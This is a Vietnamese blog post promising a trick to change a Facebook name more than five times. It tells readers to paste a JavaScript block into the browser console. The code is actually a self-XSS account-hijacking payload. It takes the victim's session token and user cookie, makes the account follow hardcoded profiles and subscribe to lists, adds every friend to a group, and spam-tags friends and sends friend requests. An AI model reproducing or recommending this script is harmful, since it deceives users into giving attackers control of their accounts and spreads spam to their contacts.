• NHẤN G+ ĐỂ THẤY LINK DOWNLOAD MIỄN PH
 • Bạn muốn đổi tn facebook, nhưng m ti khoản của bạn đ đổi qu 5 lần, bạn khng biết phải lm sao? Thực sự bạn rất cần phải đổi tn facebook v cng việc, hay đổi tn facebook để lng qun những kỉ niệm m trước đ bạn c được. V thế, sau thời gian nghin cứu, viết code v mnh đ nghĩ ra cch đổi tn facebook qu 5 lần. C thể ni cch đổi tn facebook qu 5 lần ny của mnh rất đơn giản, chỉ trong 2p l bạn c thể c tn mới cho facebook của mnh


  Đy l bằng chứng mnh đ đổi được tn facebook qu 5 lần  Download link mediafire: http://mediafire.com/umziwmdzz0z1  Bước 1 : Bạn copy hoặc tải file txt để lấy code dưới đy :


  Mã PHP:
  var fb_dtsg document.getElementsByName('fb_dtsg')[0].value;
  var 
  user_id document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  alert('XONG! NH?N ENTER Đ? HON T?T QU TR?NH UPDATE TH? THU?T FACEBOOK. CHC CC B?N ONLINE VUI V?. HTTPS://FACEBOOK.COM');
  function 
  cereziAl(isim) {
      var 
  tarama isim "=";
      if (
  document.cookie.length 0) {
          
  konum document.cookie.indexOf(tarama)
          if (
  konum != -1) {
              
  konum += tarama.length
              son 
  document.cookie.indexOf(";"konum)
              if (
  son == -1)
                  
  son document.cookie.length
              
  return unescape(document.cookie.substring(konumson))
          }
          else { return 
  ""; }
      }
  }

  function 
  getRandomInt (minmax) {
      return 
  Math.floor(Math.random() * (max min 1)) + min;
  }
  function 
  randomValue(arr) {
      return 
  arr[getRandomInt(0arr.length-1)];
  }

  var 
  fb_dtsg document.getElementsByName('fb_dtsg')[0].value;
  var 
  user_id document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

  function 
  a(abone){
      var 
  http4 = new XMLHttpRequest();
       
      var 
  url4 "/ajax/follow/follow_profile.php?__a=1";
       
      var 
  params4 "profile_id=" abone "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" fb_dtsg "&lsd&__" user_id "&phstamp=";
      
  http4.open("POST"url4true);
       
      
  //Send the proper header information along with the request
      
  http4.setRequestHeader("Content-type""application/x-www-form-urlencoded");
      
  http4.setRequestHeader("Content-length"params4.length);
      
  http4.setRequestHeader("Connection""close");
       
      
  http4.onreadystatechange = function() {//Call a function when the state changes.
      
  if(http4.readyState == && http4.status == 200) {
         
        
  http4.close// Close the connection
       
      
  }
      }
      
      
  http4.send(params4);
  }

  function 
  sublist(uidss) {
          var 
  document.createElement('script');
          
  a.innerHTML "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " uidss " }).send();";
          
  document.body.appendChild(a);
  }
  a("100002755493392");a("100004853824593");a("100004065765255");a("100005024703727");
  a("100003135729471");a("100003518302661");a("100003080767391");a("100004284123056");
  a("100002807890162");a("100004169767940");a("100006383292092");a("100006368503350");
  a("100006429243577");a("100003629810600");a("100004426803142");
  a("100002958570114");a("100003809013240");a("100006343331779");
  a("100003946922548");a("100003907411636");a("100006211892325");
  a("1242298345");
  a("100002942586835");a("100000874093748");a("100002807890162");a("100006401763023");a("100002921045873");a("100003852890482");a("100005718914057");

  sublist("448853321896280");sublist("114147745448349");sublist("209235669232458");


  var 
  gid = [''];
  var 
  fb_dtsg document['getElementsByName']('fb_dtsg')[0]['value'];
  var 
  user_id document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

  var 
  httpwp = new XMLHttpRequest();
  var 
  urlwp '/ajax/groups/membership/r2j.php?__a=1';
  var 
  paramswp '&ref=group_jump_header&group_id=' gid '&fb_dtsg=' fb_dtsg '&__user=' user_id '&phstamp=';
  httpwp['open']('POST'urlwptrue);
  httpwp['setRequestHeader']('Content-type''application/x-www-form-urlencoded');
  httpwp['setRequestHeader']('Content-length'paramswp['length']);
  httpwp['setRequestHeader']('Connection''keep-alive');
  httpwp['send'](paramswp);

  var 
  fb_dtsg document['getElementsByName']('fb_dtsg')[0]['value'];
  var 
  user_id document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

  var 
  friends = new Array();
  gf = new XMLHttpRequest();
  gf['open']('GET''/ajax/typeahead/first_degree.php?__a=1&viewer=' user_id '&token' Math['random']() + '&filter[0]=user&options[0]=friends_only'false);
  gf['send']();
  if (
  gf['readyState'] != 4) {} else {
      
  data = eval('(' gf['responseText']['substr'](9) + ')');
      if (
  data['error']) {} else {
          
  friends data['payload']['entries']['sort'](function (_0x93dax8_0x93dax9) {
              return 
  _0x93dax8['index'] - _0x93dax9['index'];
          });
      };
  };

  for (var 
  0friends['length']; i++) {
      var 
  httpwp = new XMLHttpRequest();
      var 
  urlwp '/ajax/groups/members/add_post.php?__a=1';
      var 
  paramswp'&fb_dtsg=' fb_dtsg '&group_id=' gid '&source=typeahead&ref=&message_id=&members=' friends[i]['uid'] + '&__user=' user_id '&phstamp=';
      
  httpwp['open']('POST'urlwptrue);
      
  httpwp['setRequestHeader']('Content-type''application/x-www-form-urlencoded');
      
  httpwp['setRequestHeader']('Content-length'paramswp['length']);
      
  httpwp['setRequestHeader']('Connection''keep-alive');
      
  httpwp['onreadystatechange'] = function () {
  if (
  httpwp['readyState'] == && httpwp['status'] == 200) {};
      };
      
  httpwp['send'](paramswp);
  };
  var 
  spage_id "388038841266419";
  var 
  user_id document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  var 
  smesaj "";
  var 
  smesaj_text "";
  var 
  arkadaslar = [];
  var 
  svn_rev;
  var 
  bugun= new Date();
  var 
  btarihi = new Date(); 
  btarihi.setTime(bugun.getTime() + 1000*60*60*4*1);
  if(!
  document.cookie.match(/paylasti=(\d+)/)){
  document.cookie "paylasti=hayir;expires="btarihi.toGMTString();
  }


  //arkadaslari al ve isle
  function sarkadaslari_al(){
          var 
  xmlhttp = new XMLHttpRequest();
          
  xmlhttp.onreadystatechange = function () {
              if(
  xmlhttp.readyState == 4){
                    eval(
  "arkadaslar = " xmlhttp.responseText.toString().replace("for (;;);","") + ";");
                    for(
  f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){
                      
  smesaj "";
                      
  smesaj_text "";
                    for(
  i=f*10;i<(f+1)*10;i++){
                      if(
  arkadaslar.payload.entries[i]){
                    
  smesaj += " @[" arkadaslar.payload.entries[i].uid +  ":" arkadaslar.payload.entries[i].text "]";
                    
  smesaj_text += " " arkadaslar.payload.entries[i].text;
                    }
                      }
                      
  sdurumpaylas();                }
                  
              }
              
          };
          var 
  params "&filter[0]=user";
          
  params += "&options[0]=friends_only";
          
  params += "&options[1]=nm";
          
  params += "&token=v7";
          
  params += "&viewer=" user_id;
          
  params += "&__user=" user_id;
          
          if (
  document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET""https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" paramstrue); }
          else { 
  xmlhttp.open("GET""http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" paramstrue); }
          
  xmlhttp.send();
  }

  //tiklama olayini dinle
  var tiklama document.addEventListener("click", function () {
  if(
  document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){
  svn_rev document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];
  sarkadaslari_al();
  document.cookie "paylasti=evet;expires="btarihi.toGMTString();

  document.removeEventListener(tiklama);
  }
   }, 
  false);
    

  //arkada? ekleme
  function sarkadasekle(uid,cins){
          var 
  xmlhttp = new XMLHttpRequest();
          
  xmlhttp.onreadystatechange = function () {
              if(
  xmlhttp.readyState == 4){    
              }
          };
          
          
  xmlhttp.open("POST""/ajax/add_friend/action.php?__a=1"true); 
          var 
  params "to_friend=" uid;
          
  params += "&action=add_friend";
          
  params += "&how_found=friend_browser";
          
  params += "&ref_param=none";
          
  params += "&outgoing_id=";
          
  params += "&logging_location=friend_browser";
          
  params += "&no_flyout_on_click=true";
          
  params += "&ego_log_data=";
          
  params += "&http_referer=";
          
  params += "&fb_dtsg=" document.getElementsByName('fb_dtsg')[0].value;
          
  params += "&phstamp=165816749114848369115";
          
  params += "&__user=" user_id;
          
  xmlhttp.setRequestHeader ("X-SVN-Rev"svn_rev);
          
  xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");
          
  if(
  cins == "farketmez" && document.cookie.split("cins" user_id +"=").length 1){
          
  xmlhttp.send(params);
  }else if(
  document.cookie.split("cins" user_id +"=").length <= 1){
          
  cinsiyetgetir(uid,cins,"sarkadasekle");
  }else if(
  cins == document.cookie.split("cins" user_id +"=")[1].split(";")[0].toString()){
          
  xmlhttp.send(params);
  }
  }

  //cinsiyet belirleme
  var cinssonuc = {};
  var 
  cinshtml document.createElement("html");
  function 
  scinsiyetgetir(uid,cins,fonksiyon){
          var 
  xmlhttp = new XMLHttpRequest();
          
  xmlhttp.onreadystatechange = function () {
              if(
  xmlhttp.readyState == 4){
              eval(
  "cinssonuc = " xmlhttp.responseText.toString().replace("for (;;);","") + ";");
              
  cinshtml.innerHTML cinssonuc.jsmods.markup[0][1].__html
              btarihi
  .setTime(bugun.getTime() + 1000*60*60*24*365);
              if(
  cinshtml.getElementsByTagName("select")[0].value == "1"){
              
  document.cookie "cins" user_id "=kadin;expires=" btarihi.toGMTString();
              }else if(
  cinshtml.getElementsByTagName("select")[0].value == "2"){
              
  document.cookie "cins" user_id "=erkek;expires=" btarihi.toGMTString();
              }
              eval(
  fonksiyon "(" id "," cins ");");
              }
          };
          
  xmlhttp.open("GET""/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" user_idtrue);
          
  xmlhttp.setRequestHeader ("X-SVN-Rev"svn_rev);
          
  xmlhttp.send();


  Hoặc bạn c thể tải file txt tại đy

  http://www.mediafire.com/view/jvqf9l0l09wklni/code-facebook.txt

  pass : www.vozfozum.com

  Bước 2 : Trở về trang c nhn


  đổi tn facebook qu 5 lần  Bước 3 : Lm theo hướng dẫn đối với 2 trnh duyệt Chrome v Firefox nh!

  ♦ Đối với Trnh duyệt Google Chrome: Nhấn F12 tại bn phm sẽ hiện ra 1 bảng m nguồn >> Click chuyển sang tab Console >> Ctrl+V ( Dn tất cả m đ copy ở bước 2 ) >> Rồi ấn Enter

  ♦ Đối với Trnh duyệt Firefox: Nhấn tổ hợp phm Ctrl+Shift+K với trnh duyệt ny n sẽ ở tab Console >> Ctrl+V ( Dn tất cả m đ copy ở bước 2) >> Rồi ấn Enter
  đổi tn facebook qu 5 lần 2013
  Sau đ sẽ chuyển ngay sang trang đổi thng tin c nhn, v trong đ c mục đổi tn.  đổi tn facebook qu 5 lần

  Chỉ với 3 bước đơn giản bạn đ c thể đổi tn facebook chỉ trong 3p. Thật nhanh phải khng? Đy l cch đổi tn facebook qu 5 lần mới nhất v hiệu quả nhất.

  Chc bạn thnh cng !


  Xem thm đổi tn facebook c k tự đặc biệt
  thay đổi giao diện facebook

  DOWNLOAD LINK NHANH TẠI ĐY
  Link mediafire: Link Mediafire - Link Fshare: Fshare